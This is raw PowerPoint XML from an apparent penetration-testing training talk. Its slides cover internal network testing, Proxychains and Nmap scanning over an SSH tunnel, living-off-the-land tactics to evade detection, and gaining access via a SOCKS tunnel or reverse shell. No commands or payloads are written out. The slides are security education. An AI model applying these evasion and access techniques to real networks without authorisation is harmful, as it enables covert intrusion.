            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="640080"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port scanning: NMAP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0350FABF-8AA2-4261-9249-0C04D93C46DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using Proxychains we are able to launch network tools from our attacking machine and communicate with internal hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>With this method we don’t install anything on the target environment rather we run our own tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A common tool we can use is NMAP to recon the entire internal network without ever dropping the binary inside. All thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> connected via dynamic SSH tunnel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194806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35BA6-DA48-4A49-91CE-96064ACE0083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port scanning: Living Off The Land</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0350FABF-8AA2-4261-9249-0C04D93C46DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Living off the land is a methodology which involves using available resources on the target environment such as Python, Bash, AWK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>By living off the land we don’t use common binaries which could be detected by their signature rather we write our own tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can also make use of LOTL tactics to create our own tools which a SOCKS5 proxy may be unable to work with (IPv6 link local host discovery)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149794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14D16F1A-5D78-4402-81FF-31A98AFD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408B84-F69F-44FA-98D3-79F104BC0279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Overview of recon/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>exploitation ratio</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Isosceles Triangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B2FB7F0-6A45-43E8-88A7-48E46E6D4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6BA9C607-662B-4FBB-A3F3-CF593AD73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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{971562D4-867E-4E87-86C5-C835A40EC65A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2184830316"/>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347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A3C1398-1790-48B9-921E-EC68F4EC5FAC}"/>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Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABA9841B-C4B5-4725-9CA8-8500FADB75BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Base methodology of attacking internal network hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Business/Technical considerations when performing internal testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods/Key Services to perform internal testing and securely establishing your internal access in the event of defensive response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next Talk: Further Recon &amp; Privilege Escalation Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152036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5" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0BF35CA-8AA0-428F-ABED-5B77A6C39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2" name="Straight Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4A156A-791B-4BD9-8452-A798A15D22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7652CB1-59D3-4DAB-AD45-8DFB738958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83539C1B-883E-4130-95FA-2A6FD3E49A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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{244CEE5F-144C-437F-9472-22EE3E3D1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0621BB31-AA71-4E9B-8854-3C62F162FE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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5336141D-E3C6-4E7B-8923-B31C3E16F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8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F113BE6F-9D13-4E70-B7AB-C8CC2546A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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBEB82C3-C636-4A90-B9A5-905EC38E0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646B4C4A-5A81-43CF-93ED-5FA59D5BE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C3715C1A-EBA1-41A6-AC20-D6A7C4871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611DD27-62E8-484C-B16A-6468FD287F96}"/>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800"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Question mark">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1652DDF2-4FB4-4774-92FB-694FB9A0D1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80259" y="934222"/>
            <a:ext cx="3299450" cy="3299450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2140355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0" name="Rectangle 29">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31">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3" name="Straight Connector 32">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33">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41">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02E5C8C-DEF0-4295-BCF0-FF8C4BBB6770}"/>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Thank you and see you all next time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3B93D6-03B9-4DFF-85C0-D466A82312C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Instructor:  Aqeeb Hussain </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GitHub: https://github.com/aqeebhussain122/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98874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additive="base">
                                        <p:cTn id="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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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5321817-3AE0-49D7-8A03-B31705E87606}"/>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Purpose and Context of Internal Network Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26017B89-92AD-4534-ABBC-3BC1465FB976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Purpose: Testing of internal network security defences and server configurations (Firewall, IDS/IPS, VLANs, Access Rules)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Context 1: An attacker has gained user access to an account and is attempting to escalate privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Context 2: An existing user with credentials is an insider threat attempting to infiltrate unauthorised areas of the network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258557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5BF2B39-11E0-42D5-AAF6-D321B6E6CEF3}"/>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Business/Technical Considerations Against Enterprise Networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{838644B5-4987-4D05-83D5-DF9593F17959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STAY IN SCOPE – It is vital to remain in the given scope of a test and if the scope is unintentionally breached, you must report this immediately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealth is vital – The purpose of infiltration is to keep a low profile and identify vulnerabilities without making too much noise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tread lightly – Your beachhead machine to internal network serves a purpose to the network, take all measures to ensure it does not break!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOTL (Live Off The Land) tactics – Use target binaries, craft custom tools to decrease risk of detection, never rely on off-the-shelf tools in case of their absence in the target environment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215477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0" name="Straight Connector 89">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92"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Isosceles Triangle 93">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8" name="Isosceles Triangle 97">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9" name="Isosceles Triangle 98">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3" descr="White stones balanced in a stack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C997617-8A7F-4A8D-8C24-BA20478EE83A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect l="23653" t="1670" r="8057" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5053263" y="-1"/>
            <a:ext cx="7135561" cy="6858001"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7135561" h="6858001">
                <a:moveTo>
                  <a:pt x="450267" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7135561" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7135561" y="6858001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98089" y="6858001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873508" y="4521201"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="450267" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="482"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3D9D18-E70C-44E9-BBAE-38CCD9D07E58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668866" y="1678666"/>
            <a:ext cx="5123515" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100"/>
              <a:t>Establish Access via SOCKS/Reverse Shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4100"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="101" name="Straight Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6329892-480C-49E2-BD6B-45E98C953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27138EE9-D930-4AF5-8DCA-D506DFDDAC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5" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2A878B-CC9E-4401-8BAA-9D344B5AB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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD53AF4-988B-41E6-AB9C-E5ADE7FCA8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9" name="Isosceles Triangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E2BE66-B731-4E8F-92AE-434C347FE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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C04AA99-545A-4E18-A307-965126386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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D21765B3-48FB-47ED-AFBD-CE5834471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5" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9908EBEC-783D-4C0E-AE8E-165D6FAC6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7" name="Isosceles Triangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A05D3D-E46B-44B4-BDFD-F9F117379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731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FEDD15C7-711A-4076-BD2A-AF5F074E5F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673754" y="643467"/>
            <a:ext cx="4203045" cy="1375608"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establish Access via SOCKS Tunnel</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30D1A9BE-8DCA-4E96-9B3F-3D7F1BB2EFFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
